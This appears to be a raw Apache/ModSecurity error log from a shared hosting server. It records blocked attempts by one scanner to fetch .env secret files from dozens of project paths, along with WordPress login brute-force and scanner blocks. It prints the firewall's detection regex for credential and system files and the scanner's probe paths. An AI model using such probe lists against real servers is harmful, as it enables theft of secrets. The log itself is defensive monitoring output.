[Tue May 26 14:53:49.759829 2026] [security2:error] [pid 658374:tid 658513] [client 213.209.159.175:40318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/tests/todo-react/.env"] [unique_id "ahVmpZ1Mb7_aby-E0KcsWQAAAAk"]
[Tue May 26 14:53:49.983381 2026] [security2:error] [pid 662057:tid 662262] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmpfT3lMm9tGFVg9RKOAAAAVU"]
[Tue May 26 14:53:50.035544 2026] [security2:error] [pid 662057:tid 662268] [client 74.249.173.207:4826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVmpvT3lMm9tGFVg9RKPwAAAVs"]
[Tue May 26 14:53:50.202645 2026] [security2:error] [pid 658374:tid 658570] [client 213.209.159.175:40334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/services/deployment-agent/.env"] [unique_id "ahVmpp1Mb7_aby-E0KcsZQAAAEI"]
[Tue May 26 14:53:50.640258 2026] [security2:error] [pid 658374:tid 658509] [client 213.209.159.175:40336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/demo-app/.env"] [unique_id "ahVmpp1Mb7_aby-E0KcsagAAAAU"]
[Tue May 26 14:53:51.086564 2026] [security2:error] [pid 662057:tid 662305] [client 213.209.159.175:40352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/dataset1/.env"] [unique_id "ahVmp_T3lMm9tGFVg9RKRgAAAYA"]
[Tue May 26 14:53:51.526243 2026] [security2:error] [pid 658374:tid 658625] [client 213.209.159.175:40364] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env"] [unique_id "ahVmp51Mb7_aby-E0KcsegAAAHk"]
[Tue May 26 14:53:51.534618 2026] [security2:error] [pid 658374:tid 658616] [client 3.79.134.69:45058] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVmp51Mb7_aby-E0KcsbgAAAHA"], referer: https://thegoodsporting.com
[Tue May 26 14:53:51.970487 2026] [security2:error] [pid 658374:tid 658620] [client 213.209.159.175:40378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/clld_dir/.env"] [unique_id "ahVmp51Mb7_aby-E0KcsiwAAAHQ"]
[Tue May 26 14:53:52.105938 2026] [security2:error] [pid 658374:tid 658613] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmp51Mb7_aby-E0KcsgAAAAG0"]
[Tue May 26 14:53:52.417733 2026] [security2:error] [pid 658374:tid 658553] [client 213.209.159.175:40388] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/jenkins/.env"] [unique_id "ahVmqJ1Mb7_aby-E0KcskgAAADE"]
[Tue May 26 14:53:52.631897 2026] [core:crit] [pid 658374:tid 658601] (13)Permission denied: [client 207.46.13.155:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:53:52.862795 2026] [security2:error] [pid 658374:tid 658566] [client 213.209.159.175:40404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/docker/examples/compose/.env"] [unique_id "ahVmqJ1Mb7_aby-E0KcsngAAAD4"]
[Tue May 26 14:53:52.990068 2026] [security2:error] [pid 658374:tid 658556] [client 20.12.194.227:13650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.xllent.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVmqJ1Mb7_aby-E0KcsogAAADQ"]
[Tue May 26 14:53:52.990197 2026] [security2:error] [pid 658374:tid 658556] [client 20.12.194.227:13650] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.xllent.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVmqJ1Mb7_aby-E0KcsogAAADQ"]
[Tue May 26 14:53:53.115702 2026] [security2:error] [pid 662057:tid 662282] [client 20.12.194.227:31714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.xllent.in"] [uri "/about.php"] [unique_id "ahVmqfT3lMm9tGFVg9RKbQAAAWk"]
[Tue May 26 14:53:53.115816 2026] [security2:error] [pid 662057:tid 662282] [client 20.12.194.227:31714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webdisk.xllent.in"] [uri "/about.php"] [unique_id "ahVmqfT3lMm9tGFVg9RKbQAAAWk"]
[Tue May 26 14:53:53.304681 2026] [security2:error] [pid 658374:tid 658535] [client 213.209.159.175:40420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/cryo_project/.env"] [unique_id "ahVmqZ1Mb7_aby-E0KcspAAAAB8"]
[Tue May 26 14:53:53.598092 2026] [security2:error] [pid 662057:tid 662261] [client 114.119.128.56:37343] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVmqfT3lMm9tGFVg9RKfQAAAVQ"], referer: http://glorodavionics.com/index.php?route=affiliate/forgotten
[Tue May 26 14:53:53.739642 2026] [security2:error] [pid 662057:tid 662273] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmqfT3lMm9tGFVg9RKdAAAAWA"]
[Tue May 26 14:53:53.749477 2026] [security2:error] [pid 662057:tid 662260] [client 213.209.159.175:40426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/xx-final/vue-heroes/.env"] [unique_id "ahVmqfT3lMm9tGFVg9RKfwAAAVM"]
[Tue May 26 14:53:54.191097 2026] [security2:error] [pid 662057:tid 662245] [client 213.209.159.175:40430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/code/web/.env"] [unique_id "ahVmqvT3lMm9tGFVg9RKggAAAUQ"]
[Tue May 26 14:53:54.692489 2026] [security2:error] [pid 658374:tid 658564] [client 213.209.159.175:40446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/docker-elk/.env"] [unique_id "ahVmqp1Mb7_aby-E0KcsxgAAADw"]
[Tue May 26 14:53:55.011112 2026] [security2:error] [pid 662057:tid 662230] [client 74.249.173.207:4832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/cache.php"] [unique_id "ahVmq_T3lMm9tGFVg9RKnQAAATU"]
[Tue May 26 14:53:55.131333 2026] [security2:error] [pid 662057:tid 662211] [client 213.209.159.175:40450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/core/persistence/.env"] [unique_id "ahVmq_T3lMm9tGFVg9RKoQAAASI"]
[Tue May 26 14:53:55.575651 2026] [security2:error] [pid 658374:tid 658609] [client 213.209.159.175:40462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/bitcoind/.env"] [unique_id "ahVmq51Mb7_aby-E0Kcs3gAAAGk"]
[Tue May 26 14:53:56.015724 2026] [security2:error] [pid 658374:tid 658551] [client 213.209.159.175:40464] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "162.215.241.212"] [uri "/Kubernetes/.env"] [unique_id "ahVmrJ1Mb7_aby-E0Kcs9wAAAC8"]
[Tue May 26 14:53:56.081938 2026] [security2:error] [pid 658374:tid 658544] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmq51Mb7_aby-E0Kcs4QAAACg"]
[Tue May 26 14:53:58.023512 2026] [core:crit] [pid 658374:tid 658579] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:53:58.223160 2026] [core:crit] [pid 662057:tid 662219] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:53:58.601131 2026] [security2:error] [pid 662057:tid 662265] [client 45.165.202.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmrvT3lMm9tGFVg9RK0QAAAVg"]
[Tue May 26 14:53:58.960556 2026] [security2:error] [pid 662057:tid 662187] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmrvT3lMm9tGFVg9RK4AAAAQo"]
[Tue May 26 14:53:59.352153 2026] [security2:error] [pid 662057:tid 662304] [client 74.7.241.142:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.aeromodellingconsultants.glorodavionics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVmr_T3lMm9tGFVg9RK9QAAAX8"]
[Tue May 26 14:53:59.353156 2026] [security2:error] [pid 662057:tid 662263] [client 74.7.241.142:34986] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.aeromodellingconsultants.glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVmr_T3lMm9tGFVg9RK8wABViY"]
[Tue May 26 14:53:59.540970 2026] [security2:error] [pid 662057:tid 662218] [client 154.161.32.97:47136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVmr_T3lMm9tGFVg9RK-AAAASk"]
[Tue May 26 14:53:59.541113 2026] [security2:error] [pid 662057:tid 662218] [client 154.161.32.97:47136] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVmr_T3lMm9tGFVg9RK-AAAASk"]
[Tue May 26 14:53:59.541815 2026] [security2:error] [pid 662057:tid 662236] [client 154.161.32.97:57064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVmr_T3lMm9tGFVg9RK-QAAATs"]
[Tue May 26 14:53:59.541900 2026] [security2:error] [pid 662057:tid 662236] [client 154.161.32.97:57064] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVmr_T3lMm9tGFVg9RK-QAAATs"]
[Tue May 26 14:54:00.429193 2026] [security2:error] [pid 662057:tid 662285] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmr_T3lMm9tGFVg9RLCAAAAWw"]
[Tue May 26 14:54:01.461740 2026] [security2:error] [pid 662057:tid 662100] [remote 94.76.235.103:35826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVmsfT3lMm9tGFVg9RLJAABLSo"]
[Tue May 26 14:54:02.093841 2026] [security2:error] [pid 662057:tid 662247] [client 74.249.173.207:4815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/themes.php"] [unique_id "ahVmsvT3lMm9tGFVg9RLOQAAAUY"]
[Tue May 26 14:54:02.697863 2026] [core:crit] [pid 662057:tid 662217] (13)Permission denied: [client 207.46.13.155:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:54:03.290392 2026] [security2:error] [pid 662057:tid 662294] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmsvT3lMm9tGFVg9RLRwAAAXU"]
[Tue May 26 14:54:05.208387 2026] [security2:error] [pid 658374:tid 658590] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmtJ1Mb7_aby-E0KctfAAAAFY"]
[Tue May 26 14:54:05.488765 2026] [security2:error] [pid 658374:tid 658579] [client 74.7.241.190:37770] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "pkinsurance.co.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVmtZ1Mb7_aby-E0KctigAAS1I"]
[Tue May 26 14:54:05.717655 2026] [security2:error] [pid 662057:tid 662198] [client 74.249.173.207:4617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/an.php"] [unique_id "ahVmtfT3lMm9tGFVg9RLYAAAARU"]
[Tue May 26 14:54:06.345178 2026] [security2:error] [pid 658374:tid 658447] [remote 111.229.141.137:36256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVmtp1Mb7_aby-E0KctkQAAakg"]
[Tue May 26 14:54:08.020958 2026] [security2:error] [pid 662057:tid 662187] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmt_T3lMm9tGFVg9RLhQAAAQo"]
[Tue May 26 14:54:09.550495 2026] [security2:error] [pid 658374:tid 658568] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmuZ1Mb7_aby-E0KctzAAAAEA"]
[Tue May 26 14:54:12.445873 2026] [security2:error] [pid 662057:tid 662235] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmvPT3lMm9tGFVg9RLrAAAATo"]
[Tue May 26 14:54:12.486831 2026] [security2:error] [pid 658374:tid 658577] [client 74.249.173.207:5086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.eco-green.com.mx"] [uri "/index/function.php"] [unique_id "ahVmvJ1Mb7_aby-E0KcuEAAAAEk"]
[Tue May 26 14:54:14.329173 2026] [security2:error] [pid 662057:tid 662296] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmvfT3lMm9tGFVg9RLwgAAAXc"]
[Tue May 26 14:54:14.592104 2026] [security2:error] [pid 658374:tid 658387] [remote 74.7.241.58:51476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVmvp1Mb7_aby-E0KcuPQAAGgw"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:54:15.986721 2026] [security2:error] [pid 658374:tid 658512] [client 47.128.34.128:43102] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "blog.jhonweb.com"] [uri "/robots.txt"] [unique_id "ahVmv51Mb7_aby-E0KcuUAAAAAg"]
